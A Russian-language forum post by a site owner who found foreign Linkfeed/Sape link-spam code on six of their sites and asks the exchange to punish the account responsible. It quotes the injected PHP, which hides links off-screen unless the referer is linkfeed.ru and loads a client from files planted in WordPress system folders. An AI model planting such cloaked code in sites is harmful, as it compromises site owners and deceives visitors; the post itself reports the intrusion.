Здравствуйте, сегодня обнаружил на нескольких своих сайтах посторонние ссылки, в коде появился чужой код linkfeed и sape (уже отписал на их форуме).
PHP код:
<?php
$a=getenv("HTTP_REFERER");
$b = explode("/", $a );
$c="www.linkfeed.ru";
if($c == $b[2]) {
include ($_SERVER['DOCUMENT_ROOT'].'/wp-admin/includes/link.php');
}
else{
echo '<div style="position:absolute;left:-2000px;width:2000px">';
include ($_SERVER['DOCUMENT_ROOT'].'/wp-admin/includes/link.php');
echo '</div>';
}
В коде видно, что берутся данные из файла link.php
Его содержимое:
PHP код:
<?php
define('LINKFEED_USER', 'accf6e903541a93198d3f4e3604636ca29a864ed');
require_once($_SERVER['DOCUMENT_ROOT'].'/wp-includes/pomo/'.LINKFEED_USER.'/linkfeed.php');
$linkfeed = new LinkfeedClient();
echo $linkfeed->return_links();
?>
Данный код замечен на 6 сайтах, просьба к администрации разобраться с данной ситуацией и наказать негодяя ('LINKFEED_USER', 'accf6e903541a93198d3f4e3604636ca29a864ed').